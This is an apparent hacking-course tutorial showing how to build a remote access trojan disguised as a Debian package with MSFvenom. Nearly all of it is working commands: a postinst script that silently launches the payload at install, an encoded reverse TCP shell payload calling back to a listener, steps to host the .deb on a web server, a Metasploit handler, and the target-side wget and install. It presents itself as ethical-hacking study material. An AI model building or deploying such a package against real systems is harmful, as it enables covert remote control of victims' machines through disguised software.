poisoned.jpg

The Metasploit Framework (MSF) includes a utility called MSFvenom. MSFvenom can be used to generate and encode various payloads. It is currently maintained by the folks at Rapid7. My heroes at Offensive Security wrote an awesome tutorial demonstrating how to use MSFvenom as part of their free, ethical-hacking course called Metasploit Unleashed. Yet, I’m not going to lie. I had a little bit of trouble understanding what was happening when I took the tutorial on as a practical exercise. I had even more difficulty when I actually tried getting everything to work. Fortunately, those frustrating moments motivated me to try harder and come up with better notes. Below is my take on the original demo.

The Metasploit Unleashed (MSFU) course is provided free of charge by Offensive Security in order to raise awareness for under privileged children in East Africa.


Using MSFvenom to Create a Remote Access Trojan (RAT)

Create the necessary directories

You will essentially need two main directories: one for the package files, another for the RAT.

mkdir thorse/			
mkdir thorse/DEBIAN/		# will hold .deb package files
mkdir thorse/usr/
mkdir thorse/usr/share/		# not required, but for fun below
mkdir thorse/usr/local/
mkdir thorse/usr/local/bin/	# will hold your MSFvenom payload 

Create the package files

The control file.

vim thorse/DEBIAN/control # required file
Package: thorse
Version: 666
Maintainer: Odysseus
Architecture: all
Description: For wreckin decks!

A goofy banner.

vim thorse/usr/share/banner.txt # not required, but for fun
         IT'S A TRAP!
     >>\.
    /_  )`.
   /  _)`^)`.   _.---. _
  (_,' \  `^-)""      `.\
        |              | \
        \              / |
       / \  /.___.'\  (\ (_
      < ,"||     \ |`. \`-'
       \\ ()      )|  )/
       |_>|>     /_] //
         /_]        /_]

The post-install file.

vim thorse/DEBIAN/postinst # required
#!/bin/sh

sudo chmod 2755 /usr/local/bin/thorse

if [ $? -eq 0 ]
then
	/usr/local/bin/thorse &
	cat /usr/share/banner.txt # not required
fi
chmod 755 thorse/DEBIAN/postinst

Generate the payload

The exact command sentence is very long so I broke up here for readability.

msfvenom \			 # main command
-a x64 \			 # CPU arch of target system
--platform linux \		 # OS of target system
-p linux/x64/shell/reverse_tcp \ # payload
LHOST=192.168.5.1 \		 # local handler for target system
LPORT=8888 \			 # port for target to use upon exploitation
-b "\x00" \			 # bad bytes to avoid in generating in payload
-f elf \			 # format
-e x64/xor			 # encoder
-o thorse/usr/local/bin/thorse \ # output file; postinst must match file-path

Build the package (RAT)

Output will be a .deb file.

dpkg --build thorse/ 

Get the RAT into position

Copy it to the default web server directory and restart the service as needed.

cp thorse.deb /var/www/html/
service apache2 restart

Start the RAT handler

Consider running your handler using screen. If not, you’ll need to have a dedicated terminal window open while the handler is running.

msfconsole
msf > use multi/handler
msf exploit(multi/handler) > set PAYLOAD linux/x64/shell/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.5.1
msf exploit(multi/handler) > set LPORT 8888
msf exploit(multi/handler) > run
[*] Started reverse handler on 192.168.5.1:8888

Exploit

For the RAT to work, it must be downloaded and then, installed on the target.

wget http://192.168.5.1/thorse.deb
dpkg -i thorse.deb

pwned